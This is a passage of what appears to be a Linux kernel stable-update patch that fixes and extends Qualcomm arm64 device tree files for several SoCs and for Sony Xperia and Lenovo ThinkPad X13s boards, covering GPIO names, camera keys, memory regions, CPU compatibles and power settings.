++			interrupts = <0x3 0xd8 0x1 IRQ_TYPE_EDGE_RISING>,
++				     <0x3 0xd8 0x2 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "ovp", "short";
+ 			qcom,cabc;
+ 			qcom,external-pfet;
+ 			status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/pmk8350.dtsi b/arch/arm64/boot/dts/qcom/pmk8350.dtsi
+index f0d256d99e62e..29cfb6fca9bf7 100644
+--- a/arch/arm64/boot/dts/qcom/pmk8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmk8350.dtsi
+@@ -44,7 +44,7 @@
+ 		};
+ 
+ 		pmk8350_adc_tm: adc-tm@3400 {
+-			compatible = "qcom,adc-tm7";
++			compatible = "qcom,spmi-adc-tm5-gen2";
+ 			reg = <0x3400>;
+ 			interrupts = <0x0 0x34 0x0 IRQ_TYPE_EDGE_RISING>;
+ 			#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/qcom/pmr735b.dtsi b/arch/arm64/boot/dts/qcom/pmr735b.dtsi
+index ec24c4478005a..f7473e2473224 100644
+--- a/arch/arm64/boot/dts/qcom/pmr735b.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmr735b.dtsi
+@@ -8,7 +8,7 @@
+ 
+ / {
+ 	thermal-zones {
+-		pmr735a_thermal: pmr735a-thermal {
++		pmr735b_thermal: pmr735b-thermal {
+ 			polling-delay-passive = <100>;
+ 			polling-delay = <0>;
+ 			thermal-sensors = <&pmr735b_temp_alarm>;
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp-crd.dts b/arch/arm64/boot/dts/qcom/sc8280xp-crd.dts
+index 5e30349efd204..38ec8acb7c40d 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp-crd.dts
++++ b/arch/arm64/boot/dts/qcom/sc8280xp-crd.dts
+@@ -57,7 +57,7 @@
+ 		regulator-min-microvolt = <3300000>;
+ 		regulator-max-microvolt = <3300000>;
+ 
+-		gpio = <&pmc8280_1_gpios 1 GPIO_ACTIVE_HIGH>;
++		gpio = <&pmc8280_1_gpios 2 GPIO_ACTIVE_HIGH>;
+ 		enable-active-high;
+ 
+ 		pinctrl-names = "default";
+@@ -364,7 +364,7 @@
+ 	};
+ 
+ 	misc_3p3_reg_en: misc-3p3-reg-en-state {
+-		pins = "gpio1";
++		pins = "gpio2";
+ 		function = "normal";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts b/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts
+index b2b744bb8a538..49d15432aeabf 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts
++++ b/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts
+@@ -347,7 +347,7 @@
+ };
+ 
+ &tlmm {
+-	gpio-reserved-ranges = <70 2>, <74 6>, <83 4>, <125 2>, <128 2>, <154 7>;
++	gpio-reserved-ranges = <70 2>, <74 6>, <125 2>, <128 2>, <154 4>;
+ 
+ 	kybd_default: kybd-default-state {
+ 		disable {
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index 1afc960bab5c9..405835ad28bcd 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -396,6 +396,7 @@
+ 	firmware {
+ 		scm: scm {
+ 			compatible = "qcom,scm-sc8280xp", "qcom,scm";
++			interconnects = <&aggre2_noc MASTER_CRYPTO 0 &mc_virt SLAVE_EBI1 0>;
+ 		};
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi b/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi
+index 51ee42e3c995c..d6918e6d19799 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi
+@@ -14,6 +14,15 @@
+ 	qcom,msm-id = <321 0x20001>; /* SDM845 v2.1 */
+ 	qcom,board-id = <8 0>;
+ 
++	aliases {
++		serial0 = &uart6;
++		serial1 = &uart9;
++	};
++
++	chosen {
++		stdout-path = "serial0:115200n8";
++	};
++
+ 	gpio-keys {
+ 		compatible = "gpio-keys";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index b7ba70857d0ad..52c9f5639f8a2 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -1099,6 +1099,7 @@
+ 			#clock-cells = <1>;
+ 			#reset-cells = <1>;
+ 			#power-domain-cells = <1>;
++			power-domains = <&rpmhpd SDM845_CX>;
+ 		};
+ 
+ 		qfprom@784000 {
+@@ -2520,7 +2521,7 @@
+ 				<0 0>,
+ 				<0 0>,
+ 				<0 0>,
+-				<0 300000000>;
++				<75000000 300000000>;
+ 
+ 			status = "disabled";
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sm6350.dtsi b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+index 35f621ef9da54..34c8de4f43fba 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+@@ -306,11 +306,6 @@
+ 			no-map;
+ 		};
+ 
+-		pil_gpu_mem: memory@8b715400 {
+-			reg = <0 0x8b715400 0 0x2000>;
+-			no-map;
+-		};
+-
+ 		pil_modem_mem: memory@8b800000 {
+ 			reg = <0 0x8b800000 0 0xf800000>;
+ 			no-map;
+@@ -331,6 +326,11 @@
+ 			no-map;
+ 		};
+ 
++		pil_gpu_mem: memory@f0d00000 {
++			reg = <0 0xf0d00000 0 0x1000>;
++			no-map;
++		};
++
+ 		debug_region: memory@ffb00000 {
+ 			reg = <0 0xffb00000 0 0xc0000>;
+ 			no-map;
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index 78ae4b9eaa106..f049fb42e3ca8 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -1196,7 +1196,7 @@
+ 				dma-names = "tx", "rx";
+ 				pinctrl-names = "default";
+ 				pinctrl-0 = <&qup_i2c7_default>;
+-				interrupts = <GIC_SPI 607 IRQ_TYPE_LEVEL_HIGH>;
++				interrupts = <GIC_SPI 608 IRQ_TYPE_LEVEL_HIGH>;
+ 				#address-cells = <1>;
+ 				#size-cells = <0>;
+ 				status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx203.dts b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx203.dts
+index 356a81698731a..62590c6bd3067 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx203.dts
++++ b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx203.dts
+@@ -14,3 +14,236 @@
+ };
+ 
+ /delete-node/ &vreg_l7f_1p8;
++
++&pm8009_gpios {
++	gpio-line-names = "NC", /* GPIO_1 */
++			  "CAM_PWR_LD_EN",
++			  "WIDEC_PWR_EN",
++			  "NC";
++};
++
++&pm8150_gpios {
++	gpio-line-names = "VOL_DOWN_N", /* GPIO_1 */
++			  "OPTION_2",
++			  "NC",
++			  "PM_SLP_CLK_IN",
++			  "OPTION_1",
++			  "NC",
++			  "NC",
++			  "SP_ARI_PWR_ALARM",
++			  "NC",
++			  "NC"; /* GPIO_10 */
++};
++
++&pm8150b_gpios {
++	gpio-line-names = "SNAPSHOT_N", /* GPIO_1 */
++			  "FOCUS_N",
++			  "NC",
++			  "NC",
++			  "RF_LCD_ID_EN",
++			  "NC",
++			  "NC",
++			  "LCD_ID",
++			  "NC",
++			  "WLC_EN_N", /* GPIO_10 */
++			  "NC",
++			  "RF_ID";
++};
++
++&pm8150l_gpios {
++	gpio-line-names = "NC", /* GPIO_1 */
++			  "PM3003A_EN",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "AUX2_THERM",
++			  "BB_HP_EN",
++			  "FP_LDO_EN",
++			  "PMX_RESET_N",
++			  "AUX3_THERM", /* GPIO_10 */
++			  "DTV_PWR_EN",
++			  "PM3003A_MODE";
++};
++
++&tlmm {
++	gpio-line-names = "AP_CTI_IN", /* GPIO_0 */
++			  "MDM2AP_ERR_FATAL",
++			  "AP_CTI_OUT",
++			  "MDM2AP_STATUS",
++			  "NFC_I2C_SDA",
++			  "NFC_I2C_SCL",
++			  "NFC_EN",
++			  "NFC_CLK_REQ",
++			  "NFC_ESE_PWR_REQ",
++			  "DVDT_WRT_DET_AND",
++			  "SPK_AMP_RESET_N", /* GPIO_10 */
++			  "SPK_AMP_INT_N",
++			  "APPS_I2C_1_SDA",
++			  "APPS_I2C_1_SCL",
++			  "NC",
++			  "TX_GTR_THRES_IN",
++			  "HST_BT_UART_CTS",
++			  "HST_BT_UART_RFR",
++			  "HST_BT_UART_TX",
++			  "HST_BT_UART_RX",
++			  "HST_WLAN_EN", /* GPIO_20 */
++			  "HST_BT_EN",
++			  "RGBC_IR_PWR_EN",
++			  "FP_INT_N",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NFC_ESE_SPI_MISO",
++			  "NFC_ESE_SPI_MOSI",
++			  "NFC_ESE_SPI_SCLK", /* GPIO_30 */
++			  "NFC_ESE_SPI_CS_N",
++			  "WCD_RST_N",
++			  "NC",
++			  "SDM_DEBUG_UART_TX",
++			  "SDM_DEBUG_UART_RX",
++			  "TS_I2C_SDA",
++			  "TS_I2C_SCL",
++			  "TS_INT_N",
++			  "FP_SPI_MISO", /* GPIO_40 */
++			  "FP_SPI_MOSI",
++			  "FP_SPI_SCLK",
++			  "FP_SPI_CS_N",
++			  "APPS_I2C_0_SDA",
++			  "APPS_I2C_0_SCL",
++			  "DISP_ERR_FG",
++			  "UIM2_DETECT_EN",
++			  "NC",
++			  "NC",
++			  "NC", /* GPIO_50 */
++			  "NC",
++			  "MDM_UART_CTS",
++			  "MDM_UART_RFR",
++			  "MDM_UART_TX",
++			  "MDM_UART_RX",
++			  "AP2MDM_STATUS",
++			  "AP2MDM_ERR_FATAL",
++			  "MDM_IPC_HS_UART_TX",
++			  "MDM_IPC_HS_UART_RX",
++			  "NC", /* GPIO_60 */
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "USB_CC_DIR",
++			  "DISP_VSYNC",
++			  "NC",
++			  "NC",
++			  "CAM_PWR_B_CS",
++			  "NC", /* GPIO_70 */
++			  "CAM_PWR_A_CS",
++			  "SBU_SW_SEL",
++			  "SBU_SW_OE",
++			  "FP_RESET_N",
++			  "FP_RESET_N",
++			  "DISP_RESET_N",
++			  "DEBUG_GPIO0",
++			  "TRAY_DET",
++			  "CAM2_RST_N",
++			  "PCIE0_RST_N",
++			  "PCIE0_CLK_REQ_N", /* GPIO_80 */
++			  "PCIE0_WAKE_N",
++			  "DVDT_ENABLE",
++			  "DVDT_WRT_DET_OR",
++			  "NC",
++			  "PCIE2_RST_N",
++			  "PCIE2_CLK_REQ_N",
++			  "PCIE2_WAKE_N",
++			  "MDM_VFR_IRQ0",
++			  "MDM_VFR_IRQ1",
++			  "SW_SERVICE", /* GPIO_90 */
++			  "CAM_SOF",
++			  "CAM1_RST_N",
++			  "CAM0_RST_N",
++			  "CAM0_MCLK",
++			  "CAM1_MCLK",
++			  "CAM2_MCLK",
++			  "CAM3_MCLK",
++			  "CAM4_MCLK",
++			  "TOF_RST_N",
++			  "NC", /* GPIO_100 */
++			  "CCI0_I2C_SDA",
++			  "CCI0_I2C_SCL",
++			  "CCI1_I2C_SDA",
++			  "CCI1_I2C_SCL_",
++			  "CCI2_I2C_SDA",
++			  "CCI2_I2C_SCL",
++			  "CCI3_I2C_SDA",
++			  "CCI3_I2C_SCL",
++			  "CAM3_RST_N",
++			  "NFC_DWL_REQ", /* GPIO_110 */
++			  "NFC_IRQ",
++			  "XVS",
++			  "NC",
++			  "RF_ID_EXTENSION",
++			  "SPK_AMP_I2C_SDA",
++			  "SPK_AMP_I2C_SCL",
++			  "NC",
++			  "NC",
++			  "WLC_I2C_SDA",
++			  "WLC_I2C_SCL", /* GPIO_120 */
++			  "ACC_COVER_OPEN",
++			  "ALS_PROX_INT_N",
++			  "ACCEL_INT",
++			  "WLAN_SW_CTRL",
++			  "CAMSENSOR_I2C_SDA",
++			  "CAMSENSOR_I2C_SCL",
++			  "UDON_SWITCH_SEL",
++			  "WDOG_DISABLE",
++			  "BAROMETER_INT",
++			  "NC", /* GPIO_130 */
++			  "NC",
++			  "FORCED_USB_BOOT",
++			  "NC",
++			  "NC",
++			  "WLC_INT_N",
++			  "NC",
++			  "NC",
++			  "RGBC_IR_INT",
++			  "NC",
++			  "NC", /* GPIO_140 */
++			  "NC",
++			  "BT_SLIMBUS_CLK",
++			  "BT_SLIMBUS_DATA",
++			  "HW_ID_0",
++			  "HW_ID_1",
++			  "WCD_SWR_TX_CLK",
++			  "WCD_SWR_TX_DATA0",
++			  "WCD_SWR_TX_DATA1",
++			  "WCD_SWR_RX_CLK",
++			  "WCD_SWR_RX_DATA0", /* GPIO_150 */
++			  "WCD_SWR_RX_DATA1",
++			  "SDM_DMIC_CLK1",
++			  "SDM_DMIC_DATA1",
++			  "SDM_DMIC_CLK2",
++			  "SDM_DMIC_DATA2",
++			  "SPK_AMP_I2S_CLK",
++			  "SPK_AMP_I2S_WS",
++			  "SPK_AMP_I2S_ASP_DIN",
++			  "SPK_AMP_I2S_ASP_DOUT",
++			  "COMPASS_I2C_SDA", /* GPIO_160 */
++			  "COMPASS_I2C_SCL",
++			  "NC",
++			  "NC",
++			  "SSC_SPI_1_MISO",
++			  "SSC_SPI_1_MOSI",
++			  "SSC_SPI_1_CLK",
++			  "SSC_SPI_1_CS_N",
++			  "NC",
++			  "NC",
++			  "SSC_SENSOR_I2C_SDA", /* GPIO_170 */
++			  "SSC_SENSOR_I2C_SCL",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "HST_BLE_SNS_UART6_TX",
++			  "HST_BLE_SNS_UART6_RX",
++			  "HST_WLAN_UART_TX",
++			  "HST_WLAN_UART_RX";
++};
+diff --git a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx206.dts b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx206.dts
+index 5ecf7dafb2ec4..0e50661c1b4c1 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx206.dts
++++ b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx206.dts
+@@ -20,6 +20,8 @@
+ };
+ 
+ &gpio_keys {
++	pinctrl-0 = <&focus_n &snapshot_n &vol_down_n &g_assist_n>;
++
+ 	g-assist-key {
+ 		label = "Google Assistant Key";
+ 		linux,code = <KEY_LEFTMETA>;
+@@ -30,6 +32,247 @@
+ 	};
+ };
+ 
++&pm8009_gpios {
++	gpio-line-names = "NC", /* GPIO_1 */
++			  "NC",
++			  "WIDEC_PWR_EN",
++			  "NC";
++};
++
++&pm8150_gpios {
++	gpio-line-names = "VOL_DOWN_N", /* GPIO_1 */
++			  "OPTION_2",
++			  "NC",
++			  "PM_SLP_CLK_IN",
++			  "OPTION_1",
++			  "G_ASSIST_N",
++			  "NC",
++			  "SP_ARI_PWR_ALARM",
++			  "NC",
++			  "NC"; /* GPIO_10 */
++
++	g_assist_n: g-assist-n-state {
++		pins = "gpio6";
++		function = "normal";
++		power-source = <1>;
++		bias-pull-up;
++		input-enable;
++	};
++};
++
++&pm8150b_gpios {
++	gpio-line-names = "SNAPSHOT_N", /* GPIO_1 */
++			  "FOCUS_N",
++			  "NC",
++			  "NC",
++			  "RF_LCD_ID_EN",
++			  "NC",
++			  "NC",
++			  "LCD_ID",
++			  "NC",
++			  "NC", /* GPIO_10 */
++			  "NC",
++			  "RF_ID";
++};
++
++&pm8150l_gpios {
++	gpio-line-names = "NC", /* GPIO_1 */
++			  "PM3003A_EN",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "AUX2_THERM",
++			  "BB_HP_EN",
++			  "FP_LDO_EN",
++			  "PMX_RESET_N",
++			  "NC", /* GPIO_10 */
++			  "NC",
++			  "PM3003A_MODE";
++};
++
++&tlmm {
++	gpio-line-names = "AP_CTI_IN", /* GPIO_0 */
++			  "MDM2AP_ERR_FATAL",
++			  "AP_CTI_OUT",
++			  "MDM2AP_STATUS",
++			  "NFC_I2C_SDA",
++			  "NFC_I2C_SCL",
++			  "NFC_EN",
++			  "NFC_CLK_REQ",
++			  "NFC_ESE_PWR_REQ",
++			  "DVDT_WRT_DET_AND",
++			  "SPK_AMP_RESET_N", /* GPIO_10 */
++			  "SPK_AMP_INT_N",
++			  "APPS_I2C_1_SDA",
++			  "APPS_I2C_1_SCL",
++			  "NC",
++			  "TX_GTR_THRES_IN",
++			  "HST_BT_UART_CTS",
++			  "HST_BT_UART_RFR",
++			  "HST_BT_UART_TX",
++			  "HST_BT_UART_RX",
++			  "HST_WLAN_EN", /* GPIO_20 */
++			  "HST_BT_EN",
++			  "RGBC_IR_PWR_EN",
++			  "FP_INT_N",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NFC_ESE_SPI_MISO",
++			  "NFC_ESE_SPI_MOSI",
++			  "NFC_ESE_SPI_SCLK", /* GPIO_30 */
++			  "NFC_ESE_SPI_CS_N",
++			  "WCD_RST_N",
++			  "NC",
++			  "SDM_DEBUG_UART_TX",
++			  "SDM_DEBUG_UART_RX",
++			  "TS_I2C_SDA",
++			  "TS_I2C_SCL",
++			  "TS_INT_N",
++			  "FP_SPI_MISO", /* GPIO_40 */
++			  "FP_SPI_MOSI",
++			  "FP_SPI_SCLK",
++			  "FP_SPI_CS_N",
++			  "APPS_I2C_0_SDA",
++			  "APPS_I2C_0_SCL",
++			  "DISP_ERR_FG",
++			  "UIM2_DETECT_EN",
++			  "NC",
++			  "NC",
++			  "NC", /* GPIO_50 */
++			  "NC",
++			  "MDM_UART_CTS",
++			  "MDM_UART_RFR",
++			  "MDM_UART_TX",
++			  "MDM_UART_RX",
++			  "AP2MDM_STATUS",
++			  "AP2MDM_ERR_FATAL",
++			  "MDM_IPC_HS_UART_TX",
++			  "MDM_IPC_HS_UART_RX",
++			  "NC", /* GPIO_60 */
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "USB_CC_DIR",
++			  "DISP_VSYNC",
++			  "NC",
++			  "NC",
++			  "CAM_PWR_B_CS",
++			  "NC", /* GPIO_70 */
++			  "FRONTC_PWR_EN",
++			  "SBU_SW_SEL",
++			  "SBU_SW_OE",
++			  "FP_RESET_N",
++			  "FP_RESET_N",
++			  "DISP_RESET_N",
++			  "DEBUG_GPIO0",
++			  "TRAY_DET",
++			  "CAM2_RST_N",
++			  "PCIE0_RST_N",
++			  "PCIE0_CLK_REQ_N", /* GPIO_80 */
++			  "PCIE0_WAKE_N",
++			  "DVDT_ENABLE",
++			  "DVDT_WRT_DET_OR",
++			  "NC",
++			  "PCIE2_RST_N",
++			  "PCIE2_CLK_REQ_N",
++			  "PCIE2_WAKE_N",
++			  "MDM_VFR_IRQ0",
++			  "MDM_VFR_IRQ1",
++			  "SW_SERVICE", /* GPIO_90 */
++			  "CAM_SOF",
++			  "CAM1_RST_N",
++			  "CAM0_RST_N",
++			  "CAM0_MCLK",
++			  "CAM1_MCLK",
++			  "CAM2_MCLK",
++			  "CAM3_MCLK",
++			  "NC",
++			  "NC",
++			  "NC", /* GPIO_100 */
++			  "CCI0_I2C_SDA",
++			  "CCI0_I2C_SCL",
++			  "CCI1_I2C_SDA",
++			  "CCI1_I2C_SCL_",
++			  "CCI2_I2C_SDA",
++			  "CCI2_I2C_SCL",
++			  "CCI3_I2C_SDA",
++			  "CCI3_I2C_SCL",
++			  "CAM3_RST_N",
++			  "NFC_DWL_REQ", /* GPIO_110 */
++			  "NFC_IRQ",
++			  "XVS",
++			  "NC",
++			  "RF_ID_EXTENSION",
++			  "SPK_AMP_I2C_SDA",
++			  "SPK_AMP_I2C_SCL",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "ACC_COVER_OPEN",
++			  "ALS_PROX_INT_N",
++			  "ACCEL_INT",
++			  "WLAN_SW_CTRL",
++			  "CAMSENSOR_I2C_SDA",
++			  "CAMSENSOR_I2C_SCL",
++			  "UDON_SWITCH_SEL",
++			  "WDOG_DISABLE",
++			  "BAROMETER_INT",
++			  "NC", /* GPIO_130 */
++			  "NC",
++			  "FORCED_USB_BOOT",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "RGBC_IR_INT",
++			  "NC",
++			  "NC", /* GPIO_140 */
++			  "NC",
++			  "BT_SLIMBUS_CLK",
++			  "BT_SLIMBUS_DATA",
++			  "HW_ID_0",
++			  "HW_ID_1",
++			  "WCD_SWR_TX_CLK",
++			  "WCD_SWR_TX_DATA0",
++			  "WCD_SWR_TX_DATA1",
++			  "WCD_SWR_RX_CLK",
++			  "WCD_SWR_RX_DATA0", /* GPIO_150 */
++			  "WCD_SWR_RX_DATA1",
++			  "SDM_DMIC_CLK1",
++			  "SDM_DMIC_DATA1",
++			  "SDM_DMIC_CLK2",
++			  "SDM_DMIC_DATA2",
++			  "SPK_AMP_I2S_CLK",
++			  "SPK_AMP_I2S_WS",
++			  "SPK_AMP_I2S_ASP_DIN",
++			  "SPK_AMP_I2S_ASP_DOUT",
++			  "COMPASS_I2C_SDA", /* GPIO_160 */
++			  "COMPASS_I2C_SCL",
++			  "NC",
++			  "NC",
++			  "SSC_SPI_1_MISO",
++			  "SSC_SPI_1_MOSI",
++			  "SSC_SPI_1_CLK",
++			  "SSC_SPI_1_CS_N",
++			  "NC",
++			  "NC",
++			  "SSC_SENSOR_I2C_SDA", /* GPIO_170 */
++			  "SSC_SENSOR_I2C_SCL",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "HST_BLE_SNS_UART6_TX",
++			  "HST_BLE_SNS_UART6_RX",
++			  "HST_WLAN_UART_TX",
++			  "HST_WLAN_UART_RX";
++};
++
+ &vreg_l2f_1p3 {
+ 	regulator-min-microvolt = <1200000>;
+ 	regulator-max-microvolt = <1200000>;
+diff --git a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+index 390b90a8ddf70..3b710c6a326a5 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+@@ -51,12 +51,26 @@
+ 	gpio_keys: gpio-keys {
+ 		compatible = "gpio-keys";
+ 
+-		/*
+-		 * Camera focus (light press) and camera snapshot (full press)
+-		 * seem not to work properly.. Adding the former one stalls the CPU
+-		 * and the latter kills the volume down key for whatever reason. In any
+-		 * case, they are both on &pm8150b_gpios: camera focus(2), camera snapshot(1).
+-		 */
++		pinctrl-0 = <&focus_n &snapshot_n &vol_down_n>;
++		pinctrl-names = "default";
++
++		key-camera-focus {
++			label = "Camera Focus";
++			linux,code = <KEY_CAMERA_FOCUS>;
++			gpios = <&pm8150b_gpios 2 GPIO_ACTIVE_LOW>;
++			debounce-interval = <15>;
++			linux,can-disable;
++			wakeup-source;
++		};
++
++		key-camera-snapshot {
++			label = "Camera Snapshot";
++			linux,code = <KEY_CAMERA>;
++			gpios = <&pm8150b_gpios 1 GPIO_ACTIVE_LOW>;
++			debounce-interval = <15>;
++			linux,can-disable;
++			wakeup-source;
++		};
+ 
+ 		key-vol-down {
+ 			label = "Volume Down";
+@@ -546,6 +560,34 @@
+ 	vdda-pll-supply = <&vreg_l9a_1p2>;
+ };
+ 
++&pm8150_gpios {
++	vol_down_n: vol-down-n-state {
++		pins = "gpio1";
++		function = "normal";
++		power-source = <0>;
++		bias-pull-up;
++		input-enable;
++	};
++};
++
++&pm8150b_gpios {
++	snapshot_n: snapshot-n-state {
++		pins = "gpio1";
++		function = "normal";
++		power-source = <0>;
++		bias-pull-up;
++		input-enable;
++	};
++
++	focus_n: focus-n-state {
++		pins = "gpio2";
++		function = "normal";
++		power-source = <0>;
++		bias-pull-up;
++		input-enable;
++	};
++};
++
+ &pon_pwrkey {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/qcom/sm8250.dtsi b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+index e93955525a107..4d9b30f0b2841 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+@@ -99,7 +99,7 @@
+ 			reg = <0x0 0x0>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <448>;
+-			dynamic-power-coefficient = <205>;
++			dynamic-power-coefficient = <105>;
+ 			next-level-cache = <&L2_0>;
+ 			power-domains = <&CPU_PD0>;
+ 			power-domain-names = "psci";
+@@ -123,7 +123,7 @@
+ 			reg = <0x0 0x100>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <448>;
+-			dynamic-power-coefficient = <205>;
++			dynamic-power-coefficient = <105>;
+ 			next-level-cache = <&L2_100>;
+ 			power-domains = <&CPU_PD1>;
+ 			power-domain-names = "psci";
+@@ -144,7 +144,7 @@
+ 			reg = <0x0 0x200>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <448>;
+-			dynamic-power-coefficient = <205>;
++			dynamic-power-coefficient = <105>;
+ 			next-level-cache = <&L2_200>;
+ 			power-domains = <&CPU_PD2>;
+ 			power-domain-names = "psci";
+@@ -165,7 +165,7 @@
+ 			reg = <0x0 0x300>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <448>;
+-			dynamic-power-coefficient = <205>;
++			dynamic-power-coefficient = <105>;
+ 			next-level-cache = <&L2_300>;
+ 			power-domains = <&CPU_PD3>;
+ 			power-domain-names = "psci";
+@@ -1862,6 +1862,7 @@
+ 
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie0_default_state>;
++			dma-coherent;
+ 
+ 			status = "disabled";
+ 		};
+@@ -1968,6 +1969,7 @@
+ 
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie1_default_state>;
++			dma-coherent;
+ 
+ 			status = "disabled";
+ 		};
+@@ -2076,6 +2078,7 @@
+ 
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie2_default_state>;
++			dma-coherent;
+ 
+ 			status = "disabled";
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sm8350.dtsi b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+index 7fd1c3f71c0f8..b3245b13b2611 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+@@ -63,7 +63,7 @@
+ 
+ 		CPU0: cpu@0 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-a55";
+ 			reg = <0x0 0x0>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_0>;
+@@ -82,7 +82,7 @@
+ 
+ 		CPU1: cpu@100 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-a55";
+ 			reg = <0x0 0x100>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_100>;
+@@ -98,7 +98,7 @@
+ 
+ 		CPU2: cpu@200 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-a55";
+ 			reg = <0x0 0x200>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_200>;
+@@ -114,7 +114,7 @@
+ 
+ 		CPU3: cpu@300 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-a55";
+ 			reg = <0x0 0x300>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_300>;
+@@ -130,7 +130,7 @@
+ 
+ 		CPU4: cpu@400 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-a78";
+ 			reg = <0x0 0x400>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_400>;
+@@ -146,7 +146,7 @@
+ 
+ 		CPU5: cpu@500 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-a78";
+ 			reg = <0x0 0x500>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_500>;
+@@ -163,7 +163,7 @@
+ 
+ 		CPU6: cpu@600 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-a78";
+ 			reg = <0x0 0x600>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_600>;
+@@ -179,7 +179,7 @@
+ 
+ 		CPU7: cpu@700 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-x1";
+ 			reg = <0x0 0x700>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_700>;
+@@ -236,8 +236,8 @@
+ 				compatible = "arm,idle-state";
+ 				idle-state-name = "silver-rail-power-collapse";
+ 				arm,psci-suspend-param = <0x40000004>;
+-				entry-latency-us = <355>;
+-				exit-latency-us = <909>;
++				entry-latency-us = <360>;
++				exit-latency-us = <531>;
+ 				min-residency-us = <3934>;
